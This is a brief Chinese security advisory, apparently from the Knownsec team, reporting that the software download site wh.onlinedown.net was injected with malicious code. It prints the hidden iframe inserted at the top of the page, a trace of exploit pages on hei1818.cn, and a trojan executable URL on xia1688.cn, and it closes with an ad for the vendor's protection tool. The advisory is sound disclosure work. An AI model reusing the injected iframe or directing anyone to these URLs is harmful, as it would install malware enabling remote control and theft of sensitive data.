知道创宇安全团队于今天捕获华军软件园(http://wh.onlinedown.net/)被植入恶意代码,用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。
MalUrl:http://wh.onlinedown.net/
华军软件园简介:华军软件园是中国起步较早,口碑良好的大型专业网站。是中国最具影响力的著名网站之一,原华军个人主页名列中国互联网十大个人网站之一,目前以在全国一半以上大中城市设立镜像站点及独立下载服务器且还在不断增加中以保证全国各地区用户浏览、下载的速度,是国内更新速度最快、软件数量最多、软件版本最新的共享免费软件下载中心和软硬件信息发布中心。
访问该页面会被365门神拦截恶意攻击:
网页顶部被插入一段恶意代码:
<iframe src=http://hei1818.cn/aaa/002.htm width=100 height=0></iframe>
挂马分析:
[wide]http://wh.onlinedown.net/
[frame]http://hei1818.cn/aaa/002.htm
[frame]http://hei1818.cn/aaa/14.htm
[exe]http://xia1688.cn/xia/a.exe
[frame]http://hei1818.cn/aaa/xx.htm
[exe]http://xia1688.cn/xia/a.exe
[frame]http://hei1818.cn/aaa/flash.htm
[frame]http://hei1818.cn/aaa/ie7.htm
[exe]http://xia1688.cn/xia/a.exe
[frame]http://hei1818.cn/aaa/lz.htm
[exe]http://xia1688.cn/xia/a.exe
[frame]http://hei1818.cn/aaa/office.htm
[exe]http://xia1688.cn/xia/a.exe
[frame]http://hei1818.cn/aaa/bf.htm
[exe]http://xia1688.cn/xia/a.exe
[frame]http://hei1818.cn/aaa/real.htm
[exe]http://xia1688.cn/xia/a.exe
[frame]http://hei1818.cn/aaa/real.html
[exe]http://xia1688.cn/xia/a.exe
[script]http://s68.cnzz.com/stat.php?id=1192584&web_id=1192584
下载病毒文件:http://xia1688.cn/xia/a.exe
推荐的应对方法: 安装365门神软件,对IE浏览器在打开网站的时候进行保护,拦截来自网络带有恶意代码的网页攻击。使用帮助和下载:http://365menshen.com